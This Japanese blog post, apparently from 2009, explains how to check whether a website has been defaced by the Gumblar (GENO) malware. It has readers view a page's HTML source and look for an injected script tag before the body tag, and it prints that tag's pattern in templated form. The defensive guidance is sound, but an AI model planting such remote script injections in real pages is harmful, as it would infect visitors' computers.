ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

 2009年5月に騒ぎになった正規サイトの改ざん被害「Gumblar」(GENOウイルス)の10月再来襲。ページに不正なJavaScriptタグが挿入されてるかチェックする方法を説明します。

 まず、オンラインチェッカーがいくつか存在しますが、多くのサイトが10月再来襲版の不正なデータをまったく認識しません。(対応状況

1. HTMLソースを表示する

 そこで、ページのURLアドレスを指定することで、そのページのHTMLソースを取得して表示してくれるサイトを利用して改ざんを目視で判断する方法を紹介することにします。勘違いしないでほしいのが、この2つのサイトは、悪意のある不正なデータが挿入されてるかチェックしてくれるサービスではありません。
(1) The W3C Markup Validation Service
(2) View HTTP Request and Response Header

 1番目は、HTML文法をチェックしてくれるサイトです。URLアドレスを指定して、「More Options」というリンクをクリック、チェックボックス「Show Source」に必ずマークを入れてから、Checkボタンを押してください。
 赤帯で「Error 〜 ナンたらカンたら」(エラー)と表示される場合がありますが、これは単にHTML言語の文法ミスがあるという警告なので無視してください。HTMLソースは、「Source Listing」という項目に表示されます。

 2番目は、HTTPの応答状況を提示してくれるサイトです。URLアドレスを指定して、Submitボタンを押してください。HTMLソースは、「Content」という項目に表示されます。

2. 不正なJavaScriptタグを探す

 不正なJavaScriptタグは、必ず”BODY”タグの直前にあります。HTMLソースの中に、大文字の『 <BODY 』か、小文字の『 <body 』が必ず1カ所あるので探してください。

 次に、このBODYタグの直前に『 <script src=http://[URLアドレス]/[ファイル名].php ></script> 』というものがないか確認してください。これが不正なJavaScriptタグです。このタグが1つのサイトの全ページに挿入されます。
・[URLアドレス]や[ファイル名]の部分はサイトごとにバラバラ
・「.php」と「>」の間に必ず”半角スペース”がある

 この不正なJavaScriptタグが埋め込まれてしまってるページを訪問した場合、「http:// 〜 .php」のデータが読み込まれ、何ら対策をしてないWindowsパソコンは自動的にウイルス(検出名などの情報)が発動することになります。

 BODYタグの直前に、通常はこのようなJavaScriptのタグを用意することはありません。これが存在しない場合は、改ざんされてません。

改ざんサイトのサンプルショットその他
イメージ 1

「ウイルス・セキュリティ」書庫の記事一覧

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • Kerupani129
  • ★ピサロ★
  • 物知りマン
  • Cookies
  • who
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!
ふるさと納税サイト『さとふる』
11/30まで5周年記念キャンペーン中!
Amazonギフト券1000円分当たる!

その他のキャンペーン

みんなの更新記事